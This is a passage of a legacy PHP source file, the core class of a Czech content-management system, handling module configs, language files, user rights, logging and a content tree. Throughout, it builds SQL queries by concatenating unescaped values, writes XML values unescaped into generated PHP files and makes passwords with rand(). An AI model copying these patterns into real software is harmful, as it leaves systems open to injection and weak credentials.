<?

	/* hlavni classa celeho underwoodu */

class Underwood{
   var $modules = Array();

	function Underwood(){
		$this->today = date("Y-m-d");
		$this->globalTest = $GLOBALS['test'];    	   
	}

	function getModules(){
		$dir = new dirReader();
		$val = $dir->files;
		return $val;
	}

	function getConfigs(){
	    $modulesDirs=$this->getModules();
		$parsedConfigs = "";
		
		reset($modulesDirs);
		while(list($key,$val)=each($modulesDirs)){
			if(file_exists(UW_BASE_DIR."/modules/".$val."/config.xml")){
				$modulesWithConfig[]=$val;
			}
		}

		reset($modulesWithConfig);
		while(list($key,$val)=each($modulesWithConfig)){
			$parsedConfigs[]=$this->parseXMLConfig($val);
		}

		$this->saveUwConfig($parsedConfigs);
	}

	function parseXMLConfig($module){
		$parser = new XMLParser(UW_BASE_DIR."/modules/".$module."/config.xml", 'file', 1);
		$tree = $parser->getTree();
		return $tree;
	}

	function saveUwConfig($xmldata){
		$configPath=UW_BASE_DIR."/common";
		if(file_exists($configPath) && is_dir($configPath)){
			
			$fh = fopen($configPath."/config.inc.php", 'w+');
			if(!$fh) echo $this->simpleMessage($type="error", $msg="Nepodařilo se uložit <strong>konfigurační soubor</strong>.");

			// vytvoří hlavičku do souboru
			fwrite($fh, "<?\n");
			fwrite($fh, "\t"."// Tento soubor je generován automaticky, veškeré změny budou přepsány"."\n");
			fwrite($fh, "\t"."// Soubor vytvořen: ".date("d.m.Y H:i",time())."\n");

			// preparsuje data a zapise je
			
			reset($xmldata);
			while(list($keyAll,$valAll)=each($xmldata)){
				fwrite($fh, "\n");
				if($valAll[module][title_code][value]!="" && $valAll[module][code][value]!=""){

					fwrite($fh, "\n"."/* module -> ".$valAll[module][title_code][value]." (".$valAll[module][code][value].") */"."\n");

					fwrite($fh, "\n\t"."\$cfg['".$valAll[module][code][value]."']['title_code']='".$valAll[module][title_code][value]."';");

					// submodules
					if(is_array($valAll[module][submodule])){

						if(is_array($valAll[module][submodule][item][title_code])){
							$submoduleRoot=$valAll[module][submodule];
						}else{
							$submoduleRoot=$valAll[module][submodule][item];
						}						
				
						fwrite($fh, "\n\t");

						reset($submoduleRoot);
						while(list($keySubmodule,$valSubmodule)=each($submoduleRoot)){
							fwrite($fh, "\n\t"."\$cfg['".$valAll[module][code][value]."']['submodule']['".$valSubmodule[code][value]."']['title_code']='".$valSubmodule[title_code][value]."';");
						}
					}

					// mapovani
					if(is_array($valAll[module][map])){

						if($valAll[module][map][item][0][title_code]){
							$mapRoot=$valAll[module][map][item];
						}else{
							$mapRoot=$valAll[module][map];
						}

						fwrite($fh, "\n\t");

						reset($mapRoot);
						while(list($keyMap,$valMap)=each($mapRoot)){
							fwrite($fh, "\n\t"."\$cfg['map']['".$valAll[module][code][value]."']['".$valMap[code][value]."'] = '".$valMap[title_code][value]."';");

							$map_write[]=array('title_code' => $valMap["title_code"][value], 'map' => $valMap["code"][value], 'module' => $valAll["module"]["code"][value], 'default' => $valMap["default"][value]);
						}
					}
					
					// menu
					if(is_array($valAll[module][menu])){
					
						if($valAll[module][menu][item][0][title_code]){
							$menuRoot=$valAll[module][menu][item];
						}else{
							$menuRoot=$valAll[module][menu];
						}
												
						fwrite($fh, "\n\t");

						fwrite($fh, "\n\t"."\$cfg['menu'][]=array(title_code => '".$valAll[module][title_code][value]."', uri => '', right => '".$valAll[module][code][value]."', type => 'title');");

						reset($menuRoot);
						while(list($keyMenu,$valMenu)=each($menuRoot)){
							fwrite($fh, "\n\t"."\$cfg['menu'][]=array(title_code => '".$valMenu[title_code][value]."', uri => '".$valMenu[uri][value]."', right => '".$valMenu[right][value]."', module => '".$valAll[module][code][value]."');");
						}
					}

					// db tables
					if(is_array($valAll[module][db])){
											
						if(is_array($valAll[module][db][item][table])){
							$dbRoot=$valAll[module][db];
						}else{
							$dbRoot=$valAll[module][db][item];
						}	
						
						fwrite($fh, "\n\t");

						reset($dbRoot);
						while(list($keyDb,$valDb)=each($dbRoot)){
							fwrite($fh, "\n\t"."\$cfg['db']['table']['".$valDb[code][value]."'] = '".$valDb[table][value]."';");
						}
					}

					fwrite($fh, "\n\n"."/* module <- ".$valAll[module][title][value]." */");
				}
			}

			fwrite($fh, "\n\n"."?>");
			fclose($fh);

			reset($map_write);
			while(list($key,$val)=each($map_write)){
				if(is_array($val)){
					$this->writeMap2Db($val);
				}
			}

			if(file_exists($configPath."/config.inc.php")) echo $this->simpleMessage($type="ok", $msg="<strong>Konfigurační soubor</strong> je uložen.");

		}else{
			echo $this->simpleMessage($type="error", $msg="Není kam zapsat <strong>konfigurační soubor</strong>.");
		}
	}

	// mapovani do db

	function writeMap2Db($val){
		global $link, $cfg;
		
		$query_check = "SELECT id FROM uw_structure_map WHERE map_code='".$val['map']."' AND module='".$val['module']."';";  
		$result_check = db_query($query_check,$link);
		$result_check_count = db_num_rows($result_check);
		
		if($result_check_count>0){
			$query_update = "UPDATE uw_structure_map SET title_code='".$val['title_code']."', default_node_uri='".$val['default']."', mtime=NOW() WHERE  map_code='".$val['map']."' AND module='".$val['module']."'"; 
			$result_update = db_query($query_update,$link);
		}else{
			$query_insert = "INSERT INTO uw_structure_map (map_code, title_code, default_node_uri, module, ctime, mtime) VALUES ('".$val['map']."', '".$val['title_code']."', '".$val['default']."', '".$val['module']."', NOW(), NOW());";  
			$result_insert = db_query($query_insert,$link);
		}
	}

	function getMapStructureData(){
		global $link, $cfg;

		$data=array();

		$query="SELECT * FROM uw_structure_map;";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data[$output[map_code]]=$output;
		}	
		
		return $data;
	}

	function getMapStructureLinks($lang, $k){
		global $link, $cfg;

		$dataMap = array();
		$_tmpMapStructure = array();
	
		// ziska sekce ktere jsou pod jazykem
		$intl_sections = $this->getContentIntlNodes($lang);
		
		$mapStructureData = $this->getMapStructureData();

		reset($mapStructureData);
		while(list($key,$val)=each($mapStructureData)){
			$_tmpMapStructure[]='"'.$key.'"';
		}

		$query="SELECT node_uri, map_code, id FROM uw_structure WHERE map_code IN (".implode(",",$_tmpMapStructure).") AND id IN (".implode(",",$intl_sections).") AND map_code!='';";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$dataMap[$output[$k]]=$output;
			$dataMap[$output[$k]]['default_node_uri']=$mapStructureData[$output["map_code"]]['default_node_uri'];
		}
		
		return $dataMap;
	}

	// ziska sekce pod jazykem

	function getContentIntlNodes($lang_node){
		global $link, $cfg;

		$childs = $this->getContentNodeChilds($lang_node);

		return $childs;
	}

	function getContentNodeChilds($node_node_child){
		global $link,$chData,$cfg;

// 		echo ($node_node_child.", ");

		// najde rodice, kteri jsou v urovni dal nez vrstva jazyku
		$query_node_child="SELECT id FROM uw_structure WHERE parentID='".$node_node_child."' AND deleted='".$cfg["DELETED_FALSE"]."' ORDER BY sort ASC;";
		$result_node_child = db_query($query_node_child,$link);
		while($row_node_child = db_fetch_array($result_node_child)){

			$chData[] = $row_node_child['id'];

			// rekurze
			$this->getContentNodeChilds($row_node_child['id']);
		}

		return $chData;
	}

	// jazykove soubory

	function getLangs(){
	    $modulesDirs=$this->getModules();
		$parsedConfigs = "";
		
		reset($modulesDirs);
		while(list($key,$val)=each($modulesDirs)){
			if(file_exists(UW_BASE_DIR."/modules/".$val."/lang.xml")){
				$modulesWithLang[]=$val;
			}
		}

		reset($modulesWithLang);
		while(list($key,$val)=each($modulesWithLang)){
			$parsedLangs[]=$this->parseXMLLang($val);
		}

		$this->saveUwLang($parsedLangs);
	}

	function parseXMLLang($module){
		$parser = new XMLParser(UW_BASE_DIR."/modules/".$module."/lang.xml", 'file', 1);
		$tree = $parser->getTree();
		return $tree;
	}

	function saveUwLang($xmldata){
		$configPath=UW_BASE_DIR."/common";

		if(file_exists($configPath) && is_dir($configPath)){
			
			$fh = fopen($configPath."/lang.inc.php", 'w+');
			if(!$fh) echo $this->simpleMessage($type="error", $msg="Nepodařilo se uložit <strong>jazykový soubor</strong>.");

			// vytvoří hlavičku do souboru
			fwrite($fh, "<?\n");
			fwrite($fh, "\t"."// Tento soubor je generován automaticky, veškeré změny budou přepsány"."\n");
			fwrite($fh, "\t"."// Soubor vytvořen: ".date("d.m.Y H:i",time())."\n");

			// preparsuje data a zapise je
			reset($xmldata);
			while(list($keyAll,$valAll)=each($xmldata)){
				fwrite($fh, "\n");

				if($valAll[module][code][value]!=""){
					fwrite($fh, "\n"."/* module -> (".$valAll[module][code][value].") */"."\n");
					
					// menu
					if(is_array($valAll[module][texts])){
					
						if(is_array($valAll[module][texts][item][title])){
							$titleRoot=$valAll[module][texts];
						}else{
							$titleRoot=$valAll[module][texts][item];
						}

						if(is_array($valAll[module][lang])){
							reset($valAll[module][lang]);
							while(list($key,$val)=each($valAll[module][lang])){
								fwrite($fh, "\n\t"."\$cfg['languages']['".$key."']='".$key."';");
							}
							fwrite($fh, "\n");
						}

						reset($titleRoot);
						while(list($keyTitle,$valTitle)=each($titleRoot)){
							if($valTitle[code][value]!=""){
								$tmp_lang=array();
								reset($valTitle[title]);
								while(list($key,$val)=each($valTitle[title])){
									$tmp_lang[]='\''.$key.'\' => \''.$val[value].'\'';
								}
								
								fwrite($fh, "\n"."\$cfg['text']['".$valTitle[code][value]."'] = array(".implode(",",$tmp_lang).");");
							}
						}
					}

					fwrite($fh, "\n\n"."/* module <- ".$valAll[module][code][value]." */");
				}
			}

			fwrite($fh, "\n\n"."?>");
			fclose($fh);

		/* zapise data pro javascript */
	
			$fh = fopen($configPath."/lang.js", 'w+');
			if(!$fh) echo $this->simpleMessage($type="error", $msg="Nepodařilo se uložit <strong>jazykový soubor</strong> pro javascript.");

			// vytvoří hlavičku do souboru
			fwrite($fh, "\n");
			fwrite($fh, "\t"."// Tento soubor je generován automaticky, veškeré změny budou přepsány"."\n");
			fwrite($fh, "\t"."// Soubor vytvořen: ".date("d.m.Y H:i",time())."\n");

			fwrite($fh, "\n"."var cfg = new Array();");
			fwrite($fh, "\n"."cfg['text'] = new Array();");

			// preparsuje data a zapise je
			reset($xmldata);
			while(list($keyAll,$valAll)=each($xmldata)){
				fwrite($fh, "\n");

				if($valAll[module][code][value]!=""){
					fwrite($fh, "\n"."/* module -> (".$valAll[module][code][value].") */"."\n");
					
					// menu
					if(is_array($valAll[module][texts])){

						if(is_array($valAll[module][texts][item][title])){
							$titleRoot=$valAll[module][texts];
						}else{
							$titleRoot=$valAll[module][texts][item];
						}
					
						reset($titleRoot);
						while(list($keyTitle,$valTitle)=each($titleRoot)){
							if($valTitle[code][value]!=""){								
								$tmp_lang=array();
								reset($valTitle[title]);
								while(list($key,$val)=each($valTitle[title])){
									$tmp_lang[]=''.$key.':\''.$val[value].'\'';
								}
								
								fwrite($fh, "\n"."cfg['text']['".$valTitle[code][value]."'] = {".implode(",",$tmp_lang)."};");
							}
						}
					}

					fwrite($fh, "\n\n"."/* module <- ".$valAll[module][code][value]." */");
				}
			}

			fwrite($fh, "\n\n");
			fclose($fh);

			if(file_exists($configPath."/lang.inc.php")) echo $this->simpleMessage($type="ok", $msg="<strong>Jazykový soubor</strong> je uložen.");

		}else{
			echo $this->simpleMessage($type="error", $msg="Není kam zapsat <strong>jazykový soubor</strong>.");
		}
	}

	/* getText */

	// funkce prebere vyraz z lang.inc.php
	function getText($code){
		$l=$_SESSION["uw"]["lang"];

		// pokud nenajdu text v jazyku kterem chci, vratim ceskou variantu
		if($GLOBALS['cfg']['text'][$code][$l]){
			$data=$GLOBALS['cfg']['text'][$code][$l];
		}elseif($GLOBALS['cfg']['text'][$code]['cz']){
			$data=$GLOBALS['cfg']['text'][$code]['cz'];
		}else{
			$data="%&nbsp;".$code."&nbsp;%";
			$this->logThis(__LINE__, "chybějící proměná v lang.xml: ".$code);
		}

		// $data=preg_replace("/\*\*([^\*\*]+)\*\*\*/","<$1>",$data);

		$data=$this->htmlspecialchars_decode($data);

		return $data;
	}

	function getRights(){
	    $modulesDirs=$this->getModules();
		$parsedConfigs = "";
		
		reset($modulesDirs);
		while(list($key,$val)=each($modulesDirs)){
			if(file_exists(UW_BASE_DIR."/modules/".$val."/config.xml")){
				$modulesWithConfig[]=$val;
			}
		}

		reset($modulesWithConfig);
		while(list($key,$val)=each($modulesWithConfig)){
			$parsedConfigs[]=$this->parseXMLConfig($val);
		}

		$this->saveUwRights($parsedConfigs);
	}

	function saveUwRights($xmldata){		
		global $link, $cfg, $tmp_activeRights;		

		// preparsuje data a zapise prava do db

		$data_write=array();
		
		reset($xmldata);
		while(list($keyAll,$valAll)=each($xmldata)){
			if($valAll[module][title_code][value]!="" && $valAll[module][code][value]!=""){

				// prava
				if(is_array($valAll[module][rights])){
				
					if(is_array($valAll[module][rights][item][title])){
						$rightsRoot=$valAll[module][rights];
					}else{
						$rightsRoot=$valAll[module][rights][item];
					}

					reset($rightsRoot);
					while(list($keyRights,$valRights)=each($rightsRoot)){
						$data_write[]=array(title_code => $valRights[title_code][value], right => $valRights[right][value], module => $valAll[module][code][value], submodule => $valRights[submodule][value]);
					}
				}
			}
		}

		$tmp_activeRights = array();

		reset($data_write);
		while(list($key,$val)=each($data_write)){
			if(is_array($val)){
				$this->writeRight2Db($val);
			}
		}		

		/* vycisteni tabulky prav */

			if(count($tmp_activeRights)>0){

				$query = "SELECT right_code FROM uw_rights WHERE id NOT IN (".implode(", ",$tmp_activeRights).");";
				$result = db_query($query,$link);
				while($output = db_fetch_assoc($result,$link)){
					$toDelete[] = '"'.$output[right_code].'"';
				}

				if(count($toDelete)>0){
					$query = "DELETE FROM uw_rights_users WHERE right_code IN (".implode(", ",$toDelete).");";
					$result = db_query($query,$link);
				}

				$query = "DELETE FROM uw_rights WHERE id NOT IN (".implode(", ",$tmp_activeRights).");";			
				$result = db_query($query,$link);
			}

		/* /vycisteni */	
	
		echo $this->simpleMessage($type="ok", $msg="<strong>Práva </strong> jsou uložena.");
	}

	function writeRight2Db($val){
		global $link, $cfg, $tmp_activeRights;		
		
		$query_check = "SELECT id FROM uw_rights WHERE right_code='".$val['right']."' AND module='".$val['module']."';";  
		$result_check = db_query($query_check,$link);		
		$result_check_count = db_num_rows($result_check);

		if($result_check_count>0){

			list($itemChanged) = db_fetch_row($result_check,$link);

			$query_update = "UPDATE uw_rights SET title_code='".$val['title_code']."', submodule='".$val['submodule']."', mtime=NOW() WHERE right_code='".$val['right']."' AND module='".$val['module']."'"; 
			$result_update = db_query($query_update,$link);

		}else{
			$query_insert = "INSERT INTO uw_rights (right_code, title_code, module, submodule, ctime, mtime) VALUES ('".$val['right']."', '".$val['title_code']."', '".$val['module']."', '".$val['submodule']."', NOW(), NOW());";  
			$result_insert = db_query($query_insert,$link);

			$itemChanged = db_insert_id($link);
		}

		$tmp_activeRights[] = $itemChanged;
		
	}

	function getStructureRightsData($user){
		global $link, $cfg;

		$dataR = Array();

		// nacte prava od uzivatele pro obsah
		$query_rights = "SELECT node_id, user_id FROM ".$cfg['db']['table']['content_structure_users']." ".($user>0 ? " WHERE user_id='".$user."' " : "")." ORDER BY user_id;"; 
		
		$dataR[$user]=array();
		
		$result_rights = db_query($query_rights,$link);
		$result_rights_count = db_num_rows($result_rights);
		if($result_rights_count>0){
			for ($v=0; $v<$result_rights_count; $v++) {
			list($node_id,$user_id) = db_fetch_row($result_rights,$link);
				$dataR[$user_id][]=$node_id;
			}
		}
		
		return $dataR;
	}

	function verifyUserRight($rightCode){
		global $link, $cfg;

		// pokud mam vice prav na overeni
		if(strpos($rightCode,",") === false){
			$query_condition=" AND right_code='".$rightCode."' ";
		}else{
			$tmp="";
			$tmp_cond="";
			$tmp=explode(",",$rightCode);
			reset($tmp);
			while(list($key,$val)=each($tmp)){
				$tmp_cond[]="right_code = '".$val."'";
			}
			$query_condition.=" AND (".implode(" OR ",$tmp_cond).")";
		}

		if($_SESSION['uw']['user']['id']<1) return 0;

			$query="UPDATE ".$cfg['db']['table']['users']." SET stamp='".time()."' WHERE id='".$_SESSION['uw']['user']['id']."';"; 
			$result=db_query($query,$link);

		if($rightCode=="0"){
			$query="SELECT id FROM ".$cfg['db']['table']['users']." WHERE code='".session_id()."' LIMIT 1;";
			return db_num_rows(db_query($query,$link));

			//$this->logThis(__LINE__, "query: ".$query);
			
		}else{
			$query="SELECT id FROM ".$cfg['db']['table']['users']." WHERE code='".session_id()."' LIMIT 1;";
			$result = db_query($query,$link);
			list($tmp_user_id) = db_fetch_row($result,$link);

			//$this->logThis(__LINE__, "query: ".$query);

			$query="SELECT user_id FROM ".$cfg['db']['table']['rights_users']." WHERE user_id='".$tmp_user_id."' ".$query_condition." LIMIT 1;";

			// $this->logThis(__LINE__, "query: ".$query);

			return db_num_rows(db_query($query,$link));
		}
	}

	function logActivity($userid, $type, $data, $agent){
		global $REMOTE_ADDR, $link, $cfg;

		$query= " INSERT INTO ".$cfg['db']['table']['log']." (user_id, ip, type, data, user_agent, ctime) VALUES ('".$userid."', '".$REMOTE_ADDR."', '".$type."', '".$data."', '".$agent."', NOW()); ";
		$result=db_query($query,$link);
										
		return true;
	}

	function logThis($line,$data){
		global $REMOTE_ADDR, $link, $cfg;

		$configPath=UW_BASE_DIR."/common";

		if(file_exists($configPath) && is_dir($configPath)){
			
			$fh = fopen($configPath."/log.txt", 'a+');
			fwrite($fh, "\n");
			fwrite($fh, "// date: ".date("d.m.Y H:i",time())."\n");
			fwrite($fh, "// script: ".$_SERVER['PHP_SELF']."\n");
			fwrite($fh, "// line: ".$line."\n");
			fwrite($fh, "// strlen: ".strlen($data)."\n");
			fwrite($fh, "// count: ".count($data)."\n");
			fwrite($fh, "\n".$data);
			fwrite($fh, "\n");
			fwrite($fh, "\n");
			fclose($fh);
		}

		return true;
	}

	function getLanguageSwitcher(){
		global $link, $cfg;

		$dataReturn="";

		reset($GLOBALS['cfg']['languages']);
		while (list($key,$val)=each($GLOBALS['cfg']['languages'])){  
			$dataReturn.=("\n\t".'<a href="#" onclick="changeLanguage(\''.$key.'\');"'.($key==$_SESSION['uw']['lang'] ? ' class="selectedText"' : '').'><img src="'.UW_BASE_URL.'/images/lang/'.$key.'.gif" border="0" title="'.$this->getText($GLOBALS['cfg']['languages_data'][$key][title_code]).'" alt="'.$this->getText($GLOBALS['cfg']['languages_data'][$key][title_code]).'" /></a> ');
		}
		echo("\n".'<form name="langForm" id="langForm" action="'.$_SERVER["PHP_SELF"].'" method="get">');
			if(strstr($_GET['request'],"?")){
				$tmpSplit=split("\?",$_GET['request']);
				$tmpSplitData=split("=",$tmpSplit[1]);
				$dataReturn.=("\n".'<input type="hidden" name="'.$tmpSplitData[0].'" value="'.htmlspecialchars($tmpSplitData[1]).'">');
			}else{
				$tmpSplit[0]=$_GET['request'];
			}
			reset($_GET);
			while(list($p_key,$p_val)=each($_GET)){
				if($p_key!="changeUwLanguage" && $p_key!="uwLanguage" && $p_key!="aacInfoArea" && $p_key!="sid" && $p_key!="request"){
					$dataReturn.=("\n".'<input type="hidden" name="'.$p_key.'" value="'.htmlspecialchars($p_val).'">');
				}
			}
			$dataReturn.=("\n".'<input type="hidden" name="request" id="request" value="'.htmlspecialchars($tmpSplit[0]).'">');
			$dataReturn.=("\n".'<input type="hidden" name="changeUwLanguage" id="changeUwLanguage" value="1">');
			$dataReturn.=("\n".'<input type="hidden" name="uwLanguage" id="uwLanguage" value="'.$_SESSION['uw']['lang'].'">');
		$dataReturn.=("\n".'</form>'."\n");
										
		return $dataReturn;
	}


	function generateHash($t,$l,$c){
		// type, length, characters

		$hash="";

		if($c=="pass"){
			$char = "ABCDEFGHJKMNPQRSTUVWXabcdefghjkmnpqrstuvwx23456789_*245678923456789";
		}elseif($c=="alfa"){
			$char = "ABCDEFGHJKMNPQRSTUVWXabcdefghjkmnpqrstuvwx";
		}elseif($c=="numeric"){
			$char = "012345679";
		}elseif($c=="alfanumeric"){
			$char = "ABCDEFGHJKMNPQRSTUVWXabcdefghjkmnpqrstuvwx123456790";
		}elseif($c=="alfanumeric"){
			$char = "ABCDEFGHJKMNPQRSTUVWXabcdefghjkmnpqrstuvwx123456790";
		}else{
			$char = "ABCDEFGHJKMNPQRSTUVWXabcdefghjkmnpqrstuvwx23456789_*245678923456789";
		}

		srand((double)microtime()*100000);
		for($i=0; $i<$l;$i++){
			$pass.= $char[rand()%strlen($char)]; 
		}

		$tm=floor($l/4)-1;

		$hash = ($t==2 ? substr(chunk_split(substr($pass,0,$l-$tm),4,"-"), 0, -1) : $pass);

		return $hash;
	}

	function htmlspecialchars_decode($text){
	 	return strtr($text, array_flip(get_html_translation_table(HTML_SPECIALCHARS)));
	}
	
	/* messages */

	function simpleMessage($type,$msg){
		// return ('<div style="height: 45px;"><div style="position: absolute;"><div class="mess_'.$type.'">'.$msg.'</div></div></div>');
		return ('<div class="mess_'.$type.'">'.$msg.'</div>');
	}

	function flipStatus($status){
		global $link, $cfg;

		if($status==$cfg["STATUS_INACTIVE"]){
			return $cfg["STATUS_ACTIVE"];
		}else{
			return $cfg["STATUS_INACTIVE"];
		}
	}

	function flipIndex($index){
		global $link, $cfg;

		if($index==$cfg["INDEX_INACTIVE"]){
			return $cfg["INDEX_ACTIVE"];
		}else{
			return $cfg["INDEX_INACTIVE"];
		}
	}
	
	/* simple  */

	function getButtonsStart(){
		echo("\n".'<div class="buttonsArea">');
	}

	function getButtonsEnd(){
		echo("\n".'</div>'."\n");
	}

	function checkData($string){
		return trim($string);
	}

	function insertData($string){
		return ($string);
	}

	function plainText($string){
		return strip_tags($string);
	}

	function getFilenameParts($f){
		$tmp_ext=explode(".",$f);

		$ext=strtolower($tmp_ext[count($tmp_ext)-1]);
		$name=str_replace(".".$ext,"",$f);

		if($ext==$name) $ext="";

		return array(name => $name, ext=> $ext);
	}

	function correctFilename($string){
		return preg_replace("/([^a-zA-Z0-9_.-])/","_",$string);
	}

	function getOtherFilename($filename,$n){
		$filenameData = $this->getFilenameParts($filename);
		return $filenameData[name]."_".$n.".".$filenameData[ext];
	}

	function stripString($string,$length){
		if(strlen($string)>intval($length)){
			$pulmin=($length/2)-2;
			$new_string=substr($string,0,$pulmin)."...".substr($string,-$pulmin);
		}else{
			$new_string=$string;
		}
		return '<span title="'.$string.'" class="nowrap">'.$new_string.'</span>';
	}

	function getImageFormat($f,$type){
		global $cfg;

		if($f<1){
			$format="h";
		}elseif($f>1){
			$format="w";
		}else{
			$format="n";
		}

		$title = $this->getText($cfg[library_image_format][$format][title_code]);
		$src = $cfg[library_image_format][$format][image];

		if($type==1){
			$data='<img src="'.$src.'" title="'.$title.'" alt="'.$title.'">';
		}else{
			$data=$title;
		}

		return $data;
	}

	function getUniqueFilename($filename){
		global $link, $cfg;
		$v=0;

		do{
			if($v==0){
				$storage_file_name=$filename;
			}else{
				$storage_file_name=$this->getOtherFilename($filename,$v);
			}
		
			$query_renamedfile="SELECT id FROM ".$cfg['db']['table']['files']." WHERE filename='".$storage_file_name."' LIMIT 1;";
			$result_renamedfile = db_query($query_renamedfile,$link);
			$result_count_renamedfile = db_num_rows($result_renamedfile);
			
			if($result_count_renamedfile==0){
				$data=$storage_file_name;
				break;
			}

			$v++;
			
		}while($data=="");

		return $data;
	}

	function getUniqueImagename($filename){
		global $link, $cfg;
		$v=0;

		do{
			if($v==0){
				$storage_file_name=$filename;
			}else{
				$storage_file_name=$this->getOtherFilename($filename,$v);
			}
		
			$query_renamedfile="SELECT id FROM ".$cfg['db']['table']['images']." WHERE filename='".$storage_file_name."' LIMIT 1;";
			$result_renamedfile = db_query($query_renamedfile,$link);
			$result_count_renamedfile = db_num_rows($result_renamedfile);
			
			if($result_count_renamedfile==0 && file_exists(UW_LIBRARY_IMAGES_DIR."/".$storage_file_name)==false){
				$data=$storage_file_name;
				break;
			}

			$v++;
			
		}while($data=="");

		return $data;
	}

	function getLibraryData(){
		global $link, $cfg;

		$data="";

		unset($query_arr);
		$query_arr[$v++] = "deleted='".$cfg["DELETED_FALSE"]."'";

		$query="SELECT * FROM uw_files WHERE ".implode(" AND ",$query_arr).";";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data['files'][$output[id]]=$output;
		}
		$query="SELECT * FROM uw_images WHERE ".implode(" AND ",$query_arr).";";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data['images'][$output[id]]=$output;
		}
		$query="SELECT * FROM uw_links WHERE ".implode(" AND ",$query_arr).";";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data['links'][$output[id]]=$output;
		}

		return $data;
	}

	function printSmartDate($date){
		list($time_y, $time_m, $time_d, $time_h, $time_i, $time_s) = sscanf($date, "%d-%d-%d %d:%d:%d");

		$today=date("Ymd",time());
		$tommorow=date("Ymd",time()+(60*60*24));
		$yesterday=date("Ymd",time()-(60*60*24));

		$tmp_ymd=sprintf("%02d",$time_y).sprintf("%02d",$time_m).sprintf("%02d",$time_d);

		if($today==$tmp_ymd){
			return $this->getText("today")." ".sprintf("%02d",$time_h).":".sprintf("%02d",$time_i).":".sprintf("%02d",$time_s);
		}elseif($tommorow==$tmp_ymd){
			return $this->getText("tommorow")." ".sprintf("%02d",$time_h).":".sprintf("%02d",$time_i).":".sprintf("%02d",$time_s);
		}elseif($yesterday==$tmp_ymd){
			return $this->getText("yesterday")." ".sprintf("%02d",$time_h).":".sprintf("%02d",$time_i).":".sprintf("%02d",$time_s);
		}else{
			return sprintf("%02d",$time_h).":".sprintf("%02d",$time_i).":".sprintf("%02d",$time_s)." ".sprintf("%02d",$time_d).".".sprintf("%02d",$time_m).".".sprintf("%04d",$time_y);
		}

	}

	function printSmartFilesize($filesize){
		$size = ($filesize<1000) ? $filesize."kB" : number_format(($filesize/1000),1)."MB";
		return $size;
	}

	function getFileIcon($filetype){
		
		if($filetype=="csv"){
			$icon="csv.gif";
		}elseif($filetype=="doc"){
			$icon="doc.gif";
		}elseif($filetype=="exe"){
			$icon="exe.gif";
		}elseif($filetype=="flv"){
			$icon="flv.gif";
		}elseif($filetype=="gif"){
			$icon="gif.gif";
		}elseif($filetype=="htm" || $filetype=="html"){
			$icon="htm.gif";
		}elseif($filetype=="gz" || $filetype=="tar" || $filetype=="gzip"){
			$icon="zip.gif";
		}elseif($filetype=="jpeg" || $filetype=="jpg"){
			$icon="jpg.gif";
		}elseif($filetype=="js"){
			$icon="script.gif";
		}elseif($filetype=="log"){
			$icon="log.gif";
		}elseif($filetype=="ods" || $filetype=="ots"){
			$icon="ods.gif";
		}elseif($filetype=="odt" || $filetype=="ott"){
			$icon="odt.gif";
		}elseif($filetype=="pdf"){
			$icon="pdf.gif";
		}elseif($filetype=="png"){
			$icon="png.gif";
		}elseif($filetype=="ppt" || $filetype=="pps"){
			$icon="ppt.gif";
		}elseif($filetype=="psd"){
			$icon="psd.gif";
		}elseif($filetype=="rar"){
			$icon="rar.gif";
		}elseif($filetype=="sql"){
			$icon="sql.gif";
		}elseif($filetype=="swf"){
			$icon="swf.gif";
		}elseif($filetype=="xls"){
			$icon="xls.gif";
		}elseif($filetype=="txt"){
			$icon="txt.gif";
		}elseif($filetype=="ttf"){
			$icon="ttf.gif";
		}elseif($filetype=="zip"){
			$icon="zip.gif";
		}elseif($filetype=="7z"){
			$icon="7z.gif";
		}else{
			$icon="unknown.gif";
		}

		return $icon;
	}	

	/* -> content */

	// zobrazeni webu pod rootem
	function getTreeWebs(){
		global $link, $cfg;

		echo('<ul>');

		$query="SELECT id, title FROM ".$cfg['db']['table']['content_structure']." WHERE parentID='0' AND deleted='".$cfg["DELETED_FALSE"]."';";
		$result = db_query($query,$link);
		while ($row = db_fetch_array($result)){
			echo '<li class="tree_node_web"><a href="'.$PHP_SELF.'?useWeb='.$row['id'].'&getPath='.$row['id'].'">'.$row['title'].'</a>'."\n";
			echo('<ul>');
					$this->getTreeLangs($row['id']);
			echo('</ul>');
		}

		echo('</ul>');
	}

	// zobrazeni jazykovych verzi pod webem
	function getTreeLangs($web){
		global $link, $cfg;
		if($web>0){
			$query="SELECT id, title FROM ".$cfg['db']['table']['content_structure']." WHERE parentID='".$web."' AND deleted='".$cfg["DELETED_FALSE"]."';";
			$result = db_query($query,$link);
			while ($row = db_fetch_array($result)){
				echo("\n\t".'<li class="tree_node_lang"><a href="'.$PHP_SELF.'?useWeb='.$web.'&useLang='.$row['id'].'&getPath='.$web.'" class="'.($row['id']==$_SESSION["structure"]["lang"] ? ' selectedText ' : '').'imgMiddle"><img src="'.UW_BASE_URL.'/images/lang/'.$row['title'].'.gif" border="0" title="'.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'" alt="'.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'" /> '.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'</a></li>'."\n");
			}
		}
	}

	// nacte nazvy nodu
	function getNodeTitles($nodes){
		global $link, $cfg;

		if(is_array($nodes)){
			$tmp_nodes=implode(",",$nodes);
		}elseif($nodes!=""){
			$tmp_nodes=intval($nodes);
		}else{
			return false;
		}

		$query="SELECT id, title, depth FROM ".$cfg['db']['table']['content_structure']." WHERE id IN (".$tmp_nodes.") AND deleted='".$cfg["DELETED_FALSE"]."' ORDER BY sort ASC;";
		$result = db_query($query,$link);
		while($row = db_fetch_array($result)){
			$dataReturn[$row['id']]=$row['title'];
		}
		return $dataReturn;
	}

	// vrati plnou cestu k nodu vcetne dat
	function getFullNodePath($nodeID){
		global $link,$pathData;

		$pathData=array();

		return $this->getDetailNodePath($nodeID);
		
	}

	function getDetailNodePath($nodeID){
		global $link,$pathData,$cfg;

		// najde rodice
		$query_parent="SELECT parentID, depth, title FROM ".$cfg['db']['table']['content_structure']." WHERE id='".$nodeID."' AND deleted='".$cfg["DELETED_FALSE"]."' ORDER BY sort ASC;";
		$result_parent = db_query($query_parent,$link);
